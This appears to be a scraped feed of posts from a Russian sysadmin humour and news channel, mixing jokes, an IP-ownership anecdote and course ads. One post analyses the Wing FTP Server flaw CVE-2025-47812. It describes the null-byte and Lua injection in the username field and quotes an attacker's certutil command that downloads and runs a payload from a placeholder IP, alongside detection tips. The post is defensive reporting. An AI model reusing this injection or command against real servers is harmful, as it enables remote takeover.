Типичный Сисадмин

🤔 Почему линуксоид пошел к психологу после того, как его заставили поддерживать Windows? man whoami Типичный 🌚 Сисадмин

Извечная борьба между разрабами и админами 😶 Типичный 🥸 Сисадмин

💻 Анализ журналов событий ОС Windows 🛠 🔥22 июля в 20:00 мск. приглашаем на открытый вебинар в OTUS. На вебинаре рассмотрим: - Какие журналы событий существуют в ОС Windows? - Как расширить уровень журналирования событий с помощью встроенных механизмов в ОС Windows? - Что такое Sysmon и в чём его плюсы? - Какие инструменты для анализа событий в ОС Windows могут быть полезны? 🎓После вебинара вы: - Узнаете основные журналы событий в ОС Windows. - Освоите способы настройки аудита событий в ОС Windows. - Поймёте, как Sysmon расширяет возможности журналирования событий. - Познакомитесь с инструментами, которые помогут в анализе журналов событий. Приходите, если хотите научиться эффективно работать с журналами событий Windows и повышать безопасность вашей системы! 🔐 👉 Регистрация: https://vk.cc/cNH5Qa Бесплатное занятие приурочено к старту курса “Аналитик SOC”. Курс позволит прокачать многие профессиональные навыки, такие как, работу с современными инструментами (SIEM, Wireshark), навыки выявления аномалий, анализ трафика, а также умение реагировать на инциденты и проводить threat hunting. Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

Поучительная история, которая заставляет задуматься. Наш коллега работает в небольшой компании в сельской местности, где основной интернет это оптика, а все остальное работает через LTE. Столкнувшись с проблемами связи, он решил в качестве эксперимента написать на C/C++ приложение, которое склеивает 3-4 LTE-канала в один, агрегируя их пропускную способность. Проект, который он делал в основном в свободное время, оказался на удивление удачным, приложение работает без сбоев, легко настраивается и даже имеет приятный дашборд с мониторингом трафика. Он внедрил его в своей компании, и все были довольны. До недавнего времени... Руководство, увидев успешное решение, теперь просит его подготовить релизную версию приложения, так как они хотят его продавать 💸, считая продукт собственностью компании. Ситуация усугубляется тем, что в его трудовом договоре нет ни слова о правах на интеллектуальную собственность, а разработка велась не только в рабочее время и не по их инициативе. Тут же вспоминается цитата Рэда из сериала Черный список

Никогда не переживай о том, чтобы предать свое рабочее место, потому что, если представится шанс, твое рабочее место предаст тебя 🤔

З.Ы. Если хотите создать свой продукт, делайте это на 100% в свое время, на своем оборудовании и без использования корпоративных ресурсов. Ведите подробную документацию. Вместо того чтобы воевать, эту ситуацию можно использовать как рычаг для переговоров. Когда ты единственный, кто знает, как работает код, то это отличный повод потребовать повышения ЗП, новую должность или процент с продаж. Можно также тактично указать руководству, что внутренний инструмент и коммерческий продукт это две большие разницы. Коммерческая версия потребует серьезных вложений в документацию, техническую поддержку, тестирование и обеспечение безопасности, и еще не факт, что компания готова к таким инвестициям 🙄 Типичный 🥸 Сисадмин

🔥 Microsoft заменит уволенных разработчиков Candy Crush ИИ-инструментами, которые те помогли создать После увольнения 200 сотрудников King (разработчик Candy Crush) в Барселоне выяснилось: их заменили ИИ-инструменты, которые они сами создавали. Жестокий парадокс: → Уволены дизайнеры уровней, UX-специалисты, копирайтеры; → Их ИИ-наработки теперь делают ту же работу «ради эффективности». Этичный ИИ? Пока лишь лозунг. Типичный 🥸 Сисадмин

А UDP где выдают? #предложка Типичный 😎 Сисадмин

Как перенести прод в Kubernetes on Bare Metal? 24 июля | 12:00 Selectel проведет вебинар для DevOps-инженеров, системных администраторов и техлидов. Приходите, чтобы узнать: - про новые возможности сервиса Managed Kubernetes на выделенных серверах, - как сократить расходы на 35% и повысить производительность сервисов. Вебинар бесплатный, достаточно только зарегистрироваться: https://slc.tl/1r7tr Чтобы не пропустить вебинар и узнавать о других мероприятиях, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzquvmfbM

Задача добраться до опоры и выжить. 🪓 @montajniklvs

Это тот самый момент, когда дедлайны горят, техника идет на списание, а кто-то до тебя закрутил винты на VGA-кабеле с силой, достойной затяжки колесных гаек. В такие моменты отвертка становится слишком медленным инструментом. Один щелчок кусачками и ты уже у следующего системника 😶 Типичный 🥸 Сисадмин

😱⚙️ Вас когда-нибудь пугала рутина развёртывания и тестирования приложений вручную? Курс «DevOps практики и инструменты» от OTUS — ваш путь от теории к практике: знакомство с IaC, CI/CD, системами конфигурации, хранением артефактов и observability (monitoring, logging, tracing). Программа создана практикующими экспертами, материалы регулярно обновляются, а все лекции проходят вживую. 🎁🚀 Пройдите короткое тестирование, чтобы получить доступ к записи вебинара «Организуем CD с помощью Ansible и GitLab CI». Вы увидите, как автоматизировать доставку и развёртывание, структурировать pipeline и защитить чувствительные данные. 👉 Готовы повысить свою ценность на рынке и сэкономить время на рутинных задачах? Пройдите тест прямо сейчас: https://vk.cc/cNJ5tQ Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

правила игры CrashDeck: 1) Вы застряли где-то (дома, в офисе, в мастерской, где угодно) 2) Вы можете использовать только те ресурсы, которые есть у вас под рукой в том месте, где вы застряли 3) Создайте функциональную кибердеку из того, что у вас есть. 4) вы должны иметь возможность вводить в него слова (с помощью клавиатуры, голосового распознавания, азбуки Морзе, чего угодно). Он должен иметь возможность чётко отображать вводимые вами данные (на дисплее, электронной бумаге, светодиодной матрице, принтере и т. д.) 4.5) всё должно держаться вместе, весь набор должен быть мобильным, чтобы его можно было переносить одной рукой, не разваливаясь на миллион частей. 5) У вас есть 1 час! 6) удачи! my cyberdeck

Опытный пользователь фиксанул перегрев БП ноута 🥇 Типичный 🥸 Сисадмин

Сетевое лето — собираемся у воды! 24 июля приглашаем на open-air фест для тех, кто живёт и дышит ИТ и сетевыми технологиями.   Будет: 💠общение с инженерами и архитекторами 💠техлабы и сетевые игры Need for Speed и Netcraft 💠доклады про ИИ, ЦОДы, сетевые фабрики, 5G и UC 💠разговоры про квантовые компьютеры, Warhammer и всякую нечисть.   Парк, вода, лето, экспертное коммьюнити и вы — чего ещё желать? 🌞 Регистрация

Выпрямитель для самых маленьких 👌 Это полноволновой мостовой выпрямитель, собранный без единого паяльника, чисто на термо-соплях и честном слове. Он берет 120 вольт переменки и успешно выдает 170 вольт постоянки 💡 Типичный 🥸 Сисадмин

🔥 Wing FTP Server под атакой. Разбор уязвимости и комедия ошибок от хакеров. Новость для всех, кто использует Wing FTP Server. В нем обнаружена критическая уязвимость CVE-2025-47812, которая позволяет удаленно выполнить код с правами SYSTEM/root. Уязвимость уже активно эксплуатируется, так что если у вас развернут этот сервер, необходимо обновиться до версии 7.4.4. Технически, уязвимость представляет собой комбинацию из инъекции нулевого байта (%00) и инъекции кода на языке Lua в параметре имени пользователя при аутентификации (через loginok.html). Атакующий может отправить специально сформированный запрос, используя учетную запись, для которой известен пароль (или анонимную, если она включена). Полезная нагрузка в поле username выглядит примерно так: `` имя_пользователя%00]]...вредоносный_Lua_код...-- ``. Нулевой байт обрывает обработку строки с именем, ]] корректно закрывает синтаксис объекта сессии, а -- комментирует остаток оригинального кода. В результате вредоносный Lua-код записывается в файл сессии на сервере (файл с расширением .lua в директории session). При следующем обращении к серверу (например, при запросе страницы dir.html) он считывает этот файл, десериализует данные и выполняет внедренный код. Признаки взлома можно найти в логах сервера (Log\Domains\) — ищите обрезанные записи вида `` User 'anonymous `` (без закрывающей кавычки). Более надежный способ — проверить файлы сессий в директории session на аномально большой размер или наличие подозрительного Lua-кода (например, функций для hex-декодирования или вызова io.popen). Один из реальных пейлоадов, который обнаружили исследователи, выглядел так: `` certutil -urlcache -f http://[IP_АТАКУЮЩЕГО]/[payload.exe] %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe ``. А теперь самое интересное как это выглядело на практике. Аналитики из Huntress разобрали реальную атаку и выяснили, что уязвимостью воспользовались, мягко говоря, не самые опытные хакеры. Их действия были похожи на комедию ошибок: они запускали базовые команды для разведки (ipconfig, whoami), пытались создавать пользователей с паролями вроде 123123qweqwe, делали опечатки в путях к файлам (например, c:^A.exe, где ^A — это управляющий символ SOH), пытались запустить встроенную команду dir как внешний бинарник и не смогли правильно составить curl-команду для скачивания своего же бэкдора. В конце концов, они попытались скачать и запустить пейлоад с помощью certutil, но его тут же удалил Microsoft Defender (Trojan:Win32/Ceprolad.A). После этого процесс WFTPServer.exe упал, и сессия атакующих оборвалась 😂😂 Эх, а ведь были прекрасные нулевые, когда для взлома сервера нужно было быть настоящим гением. А теперь достаточно просто найти готовый эксплойт на GitHub и уметь правильно скопировать команду... хотя, как видно, даже с последним у некоторых проблемы 😬 Типичный 🥸 Сисадмин

Переход от софтверщика к хардверщику произошёл успешно. Зато не троттлит. Типичный 🥸 Сисадмин

🔒⚙️ Как разделить корпоративную сеть на VLAN и повысить безопасность данных? Приглашаем на открытый вебинар «VLAN и маршрутизация: почему без них не обойтись в любой компании» 23 июля в 20:00 МСК. На вебинаре вы узнаете: - Зачем бизнесу нужно разделение сети на VLAN? - Как маршрутизация между VLAN помогает контролировать трафик и защищать данные? - Как настроить Access и Trunk порты на оборудовании Cisco? После вебинара вы сможете настроить VLAN, изолировать гостевые сети, создавать и конфигурировать порты для подключения и маршрутизации, а главное — освоите базовый навык, необходимый каждому сетевому инженеру. Урок проходит в преддверии старта курса «Network engineer. Basic». 👉 Регистрация для участия: https://vk.cc/cNH5Ps Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

С каждым могло быть 🛌 Типичный 🥸 Сисадмин

Некоторые костыли становятся несущей конструкцией 🎩 Типичный 🌚 Сисадмин

Хочешь ворваться в DevOps и наконец понять, как работают Kubernetes, Docker и CI/CD? Ребята из Merion Academy (того самого Youtube-канала про IT), создали курс, который помогает не просто смотреть уроки, а реально учиться: ✔️ Грамотно подобранная программа курса. ✔️ Много практики. ✔️ Помогают разобраться с затыками. ✔️ Отдельно помогут с карьерой: как составить резюме, пройти собеседования и найти работу. Что интересного в программе: 1. Построение CI/CD пайплайнов в GitLabCI и Jenkins 2. Настройка мониторинга с Zabbix, Prometheus и Grafana 3. Понимание DevSecOps, ZTNA, SASE, Defense in Depth 4. Работа с Docker, включая Docker Compose и Multistaging 5. Infrastructure-as-Code: Terraform и Ansible 5. Работа с хранилищем данных Redis Какие технологии освоишь: Docker, Ansible, Grafana, Kubernetes, Terraform, Zabbix, ELK, Jenkins, Prometheus Какие еще есть плюшки: у ребят очень доступные цены за счет того, что курс хоть и с ментором, но рассчитан на самостоятельное обучение – т.е. учишься в любое время, когда тебе удобно в образовательной платформе. ❇️ Первые 2 урока бесплатные — попробуй и реши, твое ли это. Подробнее о курсе https://wiki.merionet.ru/merion-academy/courses/devops-inzhener-s-nulya/?utm_source=tg&utm_medium=paid&utm_camapgin=TipichnyjSisadmin